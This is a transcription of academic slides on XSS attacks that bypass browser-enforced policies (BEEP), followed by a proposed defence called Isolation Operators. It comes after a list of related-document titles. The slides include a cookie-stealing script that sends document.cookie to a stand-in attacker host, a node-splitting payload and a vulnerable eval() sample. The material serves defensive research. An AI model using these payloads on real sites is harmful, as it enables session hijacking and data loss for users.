Code-Injection Attacks in Browsers Supporting Policies. Elias Athanasopoulos, Vasilis Pappas, and Evangelos P. Markatos FORTH-ICS

Similar documents
Web basics: HTTP cookies

How is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach

Web basics: HTTP cookies

Content Security Policy

2/16/18. CYSE 411/AIT 681 Secure Software Engineering. Secure Coding. The Web. Topic #11. Web Security. Instructor: Dr. Kun Sun

Is Browsing Safe? Web Browser Security. Subverting the Browser. Browser Security Model. XSS / Script Injection. 1. XSS / Script Injection

Analysis of Hypertext Isolation Techniques for Cross-site Scripting Prevention. Mike Ter Louw Prithvi Bisht V.N. Venkatakrishnan

Content Security Policy

Web Security II. Slides from M. Hicks, University of Maryland

2/16/18. Secure Coding. CYSE 411/AIT 681 Secure Software Engineering. Web Security Outline. The Web. The Web, Basically.

P2_L12 Web Security Page 1

Computer Security 3e. Dieter Gollmann. Chapter 18: 1

RKN 2015 Application Layer Short Summary

WEB SECURITY: XSS & CSRF

Robust Defenses for Cross-Site Request Forgery

Chrome Extension Security Architecture

Noncespaces: Using Randomization to Enforce Information Flow Tracking and Thwart Cross-Site Scripting Attacks

Security and Privacy. SWE 432, Fall 2016 Design and Implementation of Software for the Web

WebMTD: Defeating Web Code Injection Attacks using Web Element Attribute Mutation

Web Security IV: Cross-Site Attacks

Information Security CS 526 Topic 8

CSC 482/582: Computer Security. Cross-Site Security

Web 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007

We will show you how we bypassed every XSS mitigation we tested. Mitigation bypass-ability via script gadget chains in 16 popular libraries

Computer Security CS 426 Lecture 41

Lecture 17 Browser Security. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422

Web Security: Vulnerabilities & Attacks

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

The security of Mozilla Firefox s Extensions. Kristjan Krips

Browser code isolation

Web 2.0 Attacks Explained

Match the attack to its description:

CSP ODDITIES. Michele Spagnuolo Lukas Weichselbaum

CNIT 129S: Securing Web Applications. Ch 12: Attacking Users: Cross-Site Scripting (XSS) Part 2

Information Security CS 526 Topic 11

Ethical Hacking and Countermeasures: Web Applications, Second Edition. Chapter 3 Web Application Vulnerabilities

OWASP Top 10 Risks. Many thanks to Dave Wichers & OWASP

Lecture Overview. IN5290 Ethical Hacking

Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks

Application Security through a Hacker s Eyes James Walden Northern Kentucky University

Web Security, Summer Term 2012

Web Security, Summer Term 2012

Ruby on Rails Secure Coding Recommendations

CSC 405 Computer Security. Web Security

LECT 8 WEB SECURITY BROWSER SECURITY. Repetition Lect 7. WEB Security

Evaluating the Security Risks of Static vs. Dynamic Websites

Web insecurity Security strategies General security Listing of server-side risks Language specific security. Web Security.

Prevention Of Cross-Site Scripting Attacks (XSS) On Web Applications In The Client Side

Web Security: Vulnerabilities & Attacks

This slide shows the OWASP Top 10 Web Application Security Risks of 2017, which is a list of the currently most dangerous web vulnerabilities in

Client Side Injection on Web Applications

Towards Client-side HTML Security Policies

Don't Trust The Locals: Exploiting Persistent Client-Side Cross-Site Scripting in the Wild

Care & Feeding of Programmers: Addressing App Sec Gaps using HTTP Headers. Sunny Wear OWASP Tampa Chapter December

Security for the Web. Thanks to Dave Levin for some slides

BOOSTING THE SECURITY

CIS 4360 Secure Computer Systems XSS

CNIT 129S: Securing Web Applications. Ch 10: Attacking Back-End Components

Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems

CS 161 Computer Security

Web Application Security. Philippe Bogaerts

Security for the Web. Thanks to Dave Levin for some slides


Application Layer Attacks. Application Layer Attacks. Application Layer. Application Layer. Internet Protocols. Application Layer.

CS 142 Winter Session Management. Dan Boneh

WHY CSRF WORKS. Implicit authentication by Web browsers

Web Security Computer Security Peter Reiher December 9, 2014

So we broke all CSPs. You won't guess what happened next!

ESORICS September Martin Johns

Web Security. Jace Baker, Nick Ramos, Hugo Espiritu, Andrew Le

CHAPTER 8 CONCLUSION AND FUTURE ENHANCEMENTS

s642 web security computer security adam everspaugh

Uniform Resource Locators (URL)

Noncespaces: using randomization to enforce information flow tracking and thwart cross-site scripting attacks

CSCD 303 Essential Computer Security Fall 2018

Xilara: An XSS Filter Based on HTML Template Restoration

XSS Homework. 1 Overview. 2 Lab Environment

Finding Vulnerabilities in Web Applications

Perslink Security. Perslink Security. Eleonora Petridou Pascal Cuylaerts. System And Network Engineering University of Amsterdam.

Tabular Presentation of the Application Software Extended Package for Web Browsers

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

Among the many attacks on

PHP Security. Kevin Schroeder Zend Technologies. Copyright 2007, Zend Technologies Inc.

s642 web security computer security adam everspaugh

October 08: Introduction to Web Security

Hacking Web Sites Cross Site Scripting

Code-Reuse Attacks for the Web: Breaking XSS mitigations via Script Gadgets

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

Base64 The Security Killer

NET 311 INFORMATION SECURITY

Web Application Attacks

Presented By Rick Deacon DEFCON 15 August 3-5, 2007

Network Security - ISA 656 Web Security

Lecture Notes on Safety and Information Flow on the Web: II

6.170 Tutorial 7 - Rails Security. Prerequisites. Goals of this tutorial. Resources

Cross-domain leakiness Divulging sensitive information & attacking SSL sessions Chris Evans - Google Billy Rios - Microsoft

BOOSTING THE SECURITY OF YOUR ANGULAR 2 APPLICATION

Welcome to the OWASP TOP 10

Web Security, Part 2

Excerpts of Web Application Security focusing on Data Validation. adapted for F.I.S.T. 2004, Frankfurt

Transcription:

Code-Injection Attacks in Browsers Supporting Policies Elias Athanasopoulos, Vasilis Pappas, and Evangelos P. Markatos FORTH-ICS

What is all about? New code-injection attacks or return-to-libc attacks in the web Elias Athanasopoulos, FORTH ICS 2 Code Injec=on A>acks in Browsers

Motivation Cross-Site Scripting (XSS) is considered as a major threat XSS attacks are roughly 80% of all documented security vulnerabilities (Symantec, 2007) McAfee Websites Vulnerable to Attacks (4 th May 2009) Web sites are becoming richer AJAX interfaces Increase of client-side code (JavaScript) Elias Athanasopoulos, FORTH ICS 3

XSS Mitigation Static analysis Taint analysis Server/Client sanitization HTTP Cookies Enforcing policies in the browser Elias Athanasopoulos, FORTH ICS 4

XSS Mitigation Static analysis Taint analysis Server/Client sanitization HTTP Cookies Enforcing policies in the browser T. Jim, N. Swamy, and M. Hicks. BEEP: Defeating script injection attacks with browser-enforced embedded policies (ACM WWW 2007) Elias Athanasopoulos, FORTH ICS 5

Overview How can an attacker bypass BEEP return-to-libc attacks in the web A new framework for XSS mitigation based on Isolation Operators Elias Athanasopoulos, FORTH ICS 6

Roadmap XSS Short Introduction BEEP & Attacks Isolation Operators Conclusion Demo Elias Athanasopoulos, FORTH ICS 7

XSS Short Introduction XSS Short Introduction BEEP & Attacks Isolation Operators Conclusion Demo Elias Athanasopoulos, FORTH ICS 8

An Example A user posts a comment to a blog story She enters some JavaScript inside My cool comment. <script>location.href = www.attacker.com/document.cookie </script> Alice is browsing also the story; the script renders in her browser The attacker receives a request to her server with Alice s cookie Elias Athanasopoulos, FORTH ICS 9

Stealing Cookies The attacker has managed to steal Alice s Cookie The attacker is able to hijack Alice s session Login to the web site with Alice s credentials Perform actions in the web site like she was Alice Elias Athanasopoulos, FORTH ICS 10

is not the only way! The attacker could inject JavaScript code that performs operations on the web site Delete Alice s comments Post comments (with Alice s credentials) If Alice had administrator privileges The attacker could take full control of the web site in some occasions Elias Athanasopoulos, FORTH ICS 11

XSS!= Cookie Stealing A buffer overflow attack compromises an application This can sometimes lead to host compromising An XSS attack compromises a web application This can sometimes lead to web system compromising (e.g. the Google system ) Elias Athanasopoulos, FORTH ICS 12

BEEP & Attacks XSS Short Introduction BEEP & Attacks Isolation Operators Conclusion Demo Elias Athanasopoulos, FORTH ICS 13

BEEP The web server embeds policies in web documents The web browser Identifies trusted and non trusted client-side code Executes client-side code according to the defined policies Elias Athanasopoulos, FORTH ICS 14

Assumptions Web browsers have all the required complexity in order to detect (parse) and render a script Elias Athanasopoulos, FORTH ICS 15

Assumptions The web application developer knows exactly which scripts are trusted to be executed in the web browser grep -i \<script" -o fb-home.php wc -l 23 Elias Athanasopoulos, FORTH ICS 16

Policy Enforcement Script Whitelisting DOM Sandboxing Elias Athanasopoulos, FORTH ICS 17

Script Whitelisting Web server Generates a cryptographic hash for each script it produces Injects in each web document the list of cryptographic hashes (white-list), corresponding to the trusted scripts Web browser Using a hook, it checks if there is a hash in the white-list for each script before execution Elias Athanasopoulos, FORTH ICS 18

Limitations No validation about Script location in the web page Asynchronous events (onload, onclick, etc.) Elias Athanasopoulos, FORTH ICS 19

return-to-libc in the web An attacker could mount an attack using existing white-listed JavaScript code return-to-libc: during a buffer overflow, the attacker transfers control to a location in libc instead to code in the injected buffer Elias Athanasopoulos, FORTH ICS 20

Examples Annoyance Data Loss Complete Takeover Elias Athanasopoulos, FORTH ICS 21

Vulnerable Blog 1: <html> 2: <head> <title> Blog! </title> <head> 3: <body> 4: <a onclick="logout();">logout</a> 5: <div class="blog_entry" id="123">{text...} <input type="button" onclick="delete(123);"></div> 6: <div class="blog_comments > 7: <li> <img onload="logout();" src="logo.gif"> 8: <li> <img onload="window.location.href= http:// www.google.com ;" src="logo.gif"> 9: <li> <img onload="delete(123);"> 10: </div> 11: <a onclick="window.location.href= http:// www.google.com ;">Google</a> 12: </body> 13:</html> Elias Athanasopoulos, FORTH ICS 22

Annoyance 1: <html> 2: <head> <title> Blog! </title> <head> 3: <body> 4: <a onclick="logout();">logout</a> 5: <div class="blog_entry" id="123">{text...} <input type="button" onclick="delete(123);"></div> 6: <div class="blog_comments > 7: <li> <img onload="logout();" src="logo.gif"> 8: <li> <img onload="window.location.href= http:// www.google.com ;" src="logo.gif"> 9: <li> <img onload="delete(123);"> 10: </div> 11: <a onclick="window.location.href= http:// www.google.com ;">Google</a> 12: </body> 13:</html> Elias Athanasopoulos, FORTH ICS 23

Data Loss 1: <html> 2: <head> <title> Blog! </title> <head> 3: <body> 4: <a onclick="logout();">logout</a> 5: <div class="blog_entry" id="123">{text...} <input type="button" onclick="delete(123);"></div> 6: <div class="blog_comments > 7: <li> <img onload="logout();" src="logo.gif"> 8: <li> <img onload="window.location.href= http:// www.google.com ;" src="logo.gif"> 9: <li> <img onload="delete(123);"> 10: </div> 11: <a onclick="window.location.href= http:// www.google.com ;">Google</a> 12: </body> 13:</html> Elias Athanasopoulos, FORTH ICS 24

DOM Sandboxing The server marks specific regions as trusted <div class=untrust> no code here </div> The browser executes code only in trusted regions Elias Athanasopoulos, FORTH ICS 25

Vulnerability Node splitting <div class=untrusted> {content} </div> content := </div><div class=trusted> {script} </div><div class=untrusted> Countermeasure Noncespaces: Using Randomization to Enforce Information Flow Tracking and Thwart XSS Attacks (NDSS 2009) Elias Athanasopoulos, FORTH ICS 26

DOM Sandboxing Limitations Marking div/span elements with trust properties requires human effort grep -i \<div" -o fb-home.php wc -l 2708 grep -i "\/span" -o fb-home.php wc l 982 Sometimes an attack can take place without having a DOM tree Secure Content Sniffing for Web Browsers, or How to Stop Papers from Reviewing Themselves (Oakland 2009) Elias Athanasopoulos, FORTH ICS 27

Isolation Operators XSS Short Introduction BEEP & Attacks Isolation Operators Conclusion Demo Elias Athanasopoulos, FORTH ICS 28

Overview We propose a framework for complete isolation of trusted client-side code Key properties Attack coverage Easy implementation Low overhead Elias Athanasopoulos, FORTH ICS 29

Architecture Code separation at development time Isolation operators Browser actions Elias Athanasopoulos, FORTH ICS 30

Code Separation We propose client-side code separation at development time Server-side technologies already use similar code separation schemes PHP (<?php and?>) Enforcing the scheme in JavaScript can successfully tag all legitimate JavaScript Elias Athanasopoulos, FORTH ICS 31

<html> <img onload+= render(); > <div class= welcome > <<<< alert( Hello World ); >>>> </div> </html> Example Elias Athanasopoulos, FORTH ICS 32

Isolation Operators An Isolation Operator (IO) acts on entire blocks of code An IO transposes a block of code in a new isolated domain The isolated domain can not be ad hoc executed The code must be de-isolated first and then executed Elias Athanasopoulos, FORTH ICS 33

IO Examples XOR Symmetric encryption (e.g. AES) Matrix multiplication Create a matrix with the bytes of a script Multiply it with a matrix Elias Athanasopoulos, FORTH ICS 34

IO Examples XOR Symmetric encryption (e.g. AES) Matrix multiplication Create a matrix with the bytes of a script Multiply it with a matrix Elias Athanasopoulos, FORTH ICS 35

In Action <html> <div class= welcome > <<<< alert( Hello World ); >>>> </div> </html> Elias Athanasopoulos, FORTH ICS 36

Applying IO <html> <div class= welcome > <script> vpsuljtv2nhgwjyw/nhy... </script> </div> </html> Elias Athanasopoulos, FORTH ICS 37

Browser Actions Policies are expressed in the browser environment as actions The browser de-isolates and executes clientside code, instead of simply executing it Example Look for X-IO-Key in HTTP headers Apply XOR (X-IO-Key) and execute Elias Athanasopoulos, FORTH ICS 38

Conclusion XSS Short Introduction BEEP & Attacks Isolation Operators Conclusion Demo Elias Athanasopoulos, FORTH ICS 39

Conclusion Identify limitations of current policy based approaches for XSS mitigation Introduce new XSS attacks return-to-libc in the web Proposal of an XSS mitigation scheme based on Isolation Operators Elias Athanasopoulos, FORTH ICS 40

Ongoing Work Implementation of Isolation Operators in three leading web browsers Firefox, WebKit (Safari), Chromium Implementation of the server-side part in Apache Full evaluation Attack coverage, server overhead, client overhead, user-experience Full paper under submission Elias Athanasopoulos, FORTH ICS 41

Demo Elias Athanasopoulos, FORTH ICS 42

Thank you! Elias Athanasopoulos FORTH-ICS elathan@ics.forth.gr Elias Athanasopoulos, FORTH ICS 43

BACKUP Elias Athanasopoulos, FORTH ICS 44

IO vs ISR Isolation Operators (IO) are heavily inspired by Instruction Set Randomization (ISR) ISR operates on instruction set IOs operate on blocks of source code Elias Athanasopoulos, FORTH ICS 45

IO vs ISR ISR alert42( ); IO vpsuljtv2nhgwjyw/nhy... Elias Athanasopoulos, FORTH ICS 46

Why IO for JavaScript? Server lacks support for JavaScript handling Applying ISR for JavaScript Requires at least a full JavaScript parser at the server side The source will be parsed twice (one in production time and one in execution time) Elias Athanasopoulos, FORTH ICS 47

Evil eval() <?php $s = "<div id= malicious >". $_GET["id"]. "</div>"; echo $s;?> <script> eval(document.getelementbyid( malicious ). innerhtml); </script> Elias Athanasopoulos, FORTH ICS 48

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback